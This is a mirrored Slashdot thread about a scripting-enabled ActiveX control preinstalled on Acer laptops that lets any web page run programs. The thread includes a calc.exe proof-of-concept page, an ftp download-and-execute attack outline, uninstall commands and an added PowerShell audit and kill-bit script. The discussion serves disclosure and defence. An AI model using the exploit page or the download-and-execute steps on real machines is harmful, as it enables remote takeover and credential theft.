Slashdot Mirror


Acer May Be Bugging Computers

tomjen writes "What if a well-known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well, Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"

18 of 396 comments

  1. Re:Phew! by mallardtheduck · · Score: 3, Informative

    My HP notebook, bought about 15 months ago not only came with restore disks, but a plain Windows XP SP2 disk and disks for WinDVD and Sonic's CD recording software.

    I don't know about SONY, but in my experience, HP are more generous than most in terms of disks included with their PCs.

  2. Re:to those of us uneducated by Anonymous Coward · · Score: 5, Informative
    Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner. I do not know what harm can come of the power, in and of itself, of being able to run a program that is already on computer. Would one, through this particular acer thing, be able to pass things to that program and then have that program in turn do other bad things or what? Please give rudimentary examples.
    One could, for example, use the Windows ftp.exe client to download an arbitrary program (e.g. botnet software) and then execute it. I'm certain there are even better ways to do it but this one could work well enough to completely take over the machine.
  3. Re:to those of us uneducated by codepunk · · Score: 3, Informative

    I have not seen the control or have a copy of it but it can be as simple as a couple of lines of script in a web page. Now I can possibly own most Acer laptops visiting that page.

    The script could do something like this
    ftp somehost
    ftp get somefile
    execute somefile

    Bingo I own your laptop.

    Or say I just ftp your firefox data so I can grab your history, passwords etc.

    --
    Got Code?
  4. Re:present on Aspire 1690 by valeurnutritive · · Score: 5, Informative

    To remove this from your machine.

    Go to Start > Run and type:
    regsvr32 -u lunchapp.ocx

    (-u for uninstall)
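
A check a defender could run after the `regsvr32 -u` step above, as an added example that is not part of the original thread: it reports whether the control with the class ID quoted in this thread is still registered and marked safe for scripting, and can set the Internet Explorer kill bit for it. The `-ApplyKillBit` switch name is illustrative; the category IDs and the kill-bit registry location are the standard Windows ones.

```powershell
# Added example: audit the Acer control discussed in this thread and optionally set its IE kill bit.
param([switch]$ApplyKillBit)   # hypothetical switch name; applying needs an elevated prompt

$clsid   = '{D9998BD0-7957-11D2-8FED-00606730D3AA}'   # class ID quoted in the thread
$killBit = 0x400                                       # "do not load in IE" compatibility flag
$ieKey   = 'Microsoft\Internet Explorer\ActiveX Compatibility'

# Categories a control registers under to claim it is safe to drive from a web page.
# A control can also make the claim in code (IObjectSafety), which this check cannot see.
$safeCats = @{
    '{7DD95801-9882-11CF-9FA9-00AA006C42C4}' = 'safe for scripting'
    '{7DD95802-9882-11CF-9FA9-00AA006C42C4}' = 'safe for initializing'
}

# On 64-bit Windows a 32-bit control lives in the Wow6432Node view, so check both.
$views = @(
    @{ Name = 'native'; Classes = 'Registry::HKEY_CLASSES_ROOT\CLSID'
       Compat = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\$ieKey" },
    @{ Name = 'Wow6432Node'; Classes = 'Registry::HKEY_CLASSES_ROOT\Wow6432Node\CLSID'
       Compat = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\$ieKey" }
)

foreach ($v in $views) {
    $clsKey = "$($v.Classes)\$clsid"
    $kbKey  = "$($v.Compat)\$clsid"
    $registered = Test-Path -LiteralPath $clsKey
    $server = (Get-ItemProperty -LiteralPath "$clsKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    $claims = @($safeCats.Keys | Where-Object { Test-Path -LiteralPath "$clsKey\Implemented Categories\$_" } |
                ForEach-Object { $safeCats[$_] })
    $flags  = (Get-ItemProperty -LiteralPath $kbKey -ErrorAction SilentlyContinue).'Compatibility Flags'
    $killed = [bool]($flags -band $killBit)

    # Set the kill bit even when the control is absent, so a later re-registration stays blocked.
    if ($ApplyKillBit -and -not $killed -and (Test-Path -LiteralPath $v.Compat)) {
        if (-not (Test-Path -LiteralPath $kbKey)) { New-Item -Path $kbKey | Out-Null }
        New-ItemProperty -LiteralPath $kbKey -Name 'Compatibility Flags' -PropertyType DWord `
            -Value ([int]$flags -bor $killBit) -Force | Out-Null
        $killed = $true
    }

    [pscustomobject]@{
        View = $v.Name; Registered = $registered; Server = $server
        MarkedSafe = $claims -join ', '; KillBitSet = $killed
    }
}
```

Unregistering removes the control until something registers it again; the kill bit keeps Internet Explorer from loading that class ID even if the file returns.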

  5. Uhh, there already IS an exploit... by nweaver · · Score: 5, Informative

    Read the article: There's a trivial piece of example "exploit" code running calc.exe.

    But as you can run ANY windows binary with any command line (at least according to the article), actual exploitation is trivial.

    --
    Test your net with Netalyzr
  6. Late again! by whoever57 · · Score: 5, Informative

    Apparently, someone in Brazil noticed this last November

    --
    The real "Libtards" are the Libertarians!
  7. Re:And now that it's publicized... by Ninwa · · Score: 5, Informative

    The class-id was in the article :-) D9998BD0-7957-11D2-8FED-00606730D3AA

  8. Re:Phew! by phalse+phace · · Score: 3, Informative

    Don't know about you, but I wouldn't call $20 a ridiculous amount to pay for a set of restore disks. And you can avoid paying the $20 or so by burning your own set of restore disks... my HP notebook prompted me to do so when I first turned it on. It just burns an image of the restore partition on the C: drive. If you forget or decide you want to do it later, it will/can remind you again in a couple days or so.

  9. @mozilla.org/process/util;1 by MushMouth · · Score: 3, Informative

    Any mozilla extension (chrome) on mozilla/thunderbird/seamonkey/firefox/camino has access to this component which can run anything the user can.

  10. Re:Phew! by belmolis · · Score: 4, Informative

    I recently bought a laptop with Ubuntu pre-installed from The Linux Store, which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.

  11. Re:Phew! by Propaganda13 · · Score: 3, Informative

    Corrupt that extra partition and see how far that "restore" disk gets you. It's not the regular Windows restore disk that used to come with computers and it's definitely not a Windows disk. It won't work without the data on the partition.

    $20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.

  12. That's BS by cheros · · Score: 3, Informative

    Sony and HP don't include restore disks because they're harder to keep current than a production disk image - they're DVDs, not CDs.

    All you need to do is burn the images (DVDs) when you get the laptop, and Sony positively nags you repeatedly to do it. Also, if you leave the recovery partition in place you can do it again later.

    As for getting the original DVDs, they don't charge a ridiculous amount (in the $60 region) but they do ask for a ridiculous amount of proof that it's your own laptop and you're not going to share the disks with the world.

    Don't know about HP, but have handled enough Sony laptops :-)

    --
    Insert .sig here. Send no money now. Owner may sue, contents will settle. Batteries not included.
  13. Re:to those of us uneducated by this+great+guy · · Score: 4, Informative
    It is possible to use ftp.exe in such a way. I work in the ITsec field and have used this exploitation technique in the past (step 1: create foo.txt containing ftp commands to download malicious.exe, step 2: run ftp.exe @foo.txt, step 3: run malicious.exe).

    I really have a hard time understanding your mindset. You refuse to believe in the seriousness of the vuln even when people give you an attack vector example. Please, why?

  14. Re:present on Aspire 1690 by Odin_Tiger · · Score: 3, Informative

    I was under the impression that only the exe went in the second param, and flags went in the final. Shouldn't it be
    hahaha.Run("c", "\\windows\\system32\\regsvr32.exe", "-u lunchapp.ocx")
    ?

    --
    Unpleasantries.
  15. Test/exploit code by Koyaanisqatsi · · Score: 3, Informative

    The code to test for the vulnerability, right from the Brazilian article about it linked on another post. Save it as an html file and browse it with IE.

    <html>
    <body>
    <object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
    </object>
    <script>
    hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
    </script>
    </body>
    </html>

  16. Re:Phew! by Tauvix · · Score: 3, Informative

    I work for a major retail chain that sells HP/Compaq notebooks and desktops. HP/Compaq desktops have required you to create the recovery discs for at least 3 years now, however it was not until the August/September 2005 model refresh that they stopped shipping recovery discs with their notebooks.

  17. Re:present on Aspire 1690 by Staale+Nordlie · · Score: 3, Informative

    You're right. It doesn't seem to matter though, as (like I said) it worked fine the way I did it. I got a confirmation message and my Acer laptop no longer runs calc.exe with the code from the article.

  18. Question: is this another Acer backdoor? by GreatBunzinni · · Score: 3, Informative

    When I read this message what popped right on my mind was the existence of an administrator account which came pre-installed on my Acer laptop. The account is called "ASP.NET Machine A..." which is protected by a password and I'm not able to uninstall it no matter what I try. Can this be another Acer backdoor installed on their systems?

    P.S.: the article's backdoor was also present on my system. those bastards...

    --
    Slashdot, fix your code or at least hire someone who is competent at it to do it for you.